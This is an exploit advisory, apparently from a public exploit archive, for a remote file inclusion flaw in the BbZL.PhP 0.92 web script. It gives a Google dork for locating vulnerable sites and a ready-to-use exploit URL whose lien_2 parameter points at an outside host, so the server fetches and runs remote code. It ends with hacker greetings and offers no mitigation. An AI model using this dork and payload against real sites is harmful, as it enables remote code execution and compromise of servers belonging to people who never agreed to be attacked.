bbzl PHP version 0.92 suffers from a remote file inclusion vulnerability.
e6ef7da7b99fd757b06ae9626b38ebaa35c53dd7aedef24f52d412905ffb9a0f
_________________________________________________________________________________________
| _ _ |
| ||\\ || || || | \\ // | ____ ________ __________ |
| || \\ || || || | |\\ //| | | \ | ______| |_______/ / |
| || \\ || || || | | \\ // | | | _ \ | | / / |
| || \\ || || || | | \\ // | | | |_) | | |______ /\`'__\ / / |
| || \\ || || || | | \\ // | | | _ < | ______| \ \ \/ / / |
| || \\ || ||_______|| | | \\// | | | |_) | | |______ \ \_\ / / |
| || \\|| |_________| |_| \/ |_| |_____/ |________| \/_/ /_/ |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [BbZL.PhP File Inclusion Exploit]
# Google Dork: [intitle:"BbZL.PhP 0.92 CSSĀ²"]
# Date: [06/07/2011]
# Author: [Number 7]
# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]
# Version: [0.92 CSSĀ²]
# Tested on: [linux/Windows NT]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreetZ:S-man // Wx // Alen // M@TaDoR // LastBreath1 // all Tunisian Hackers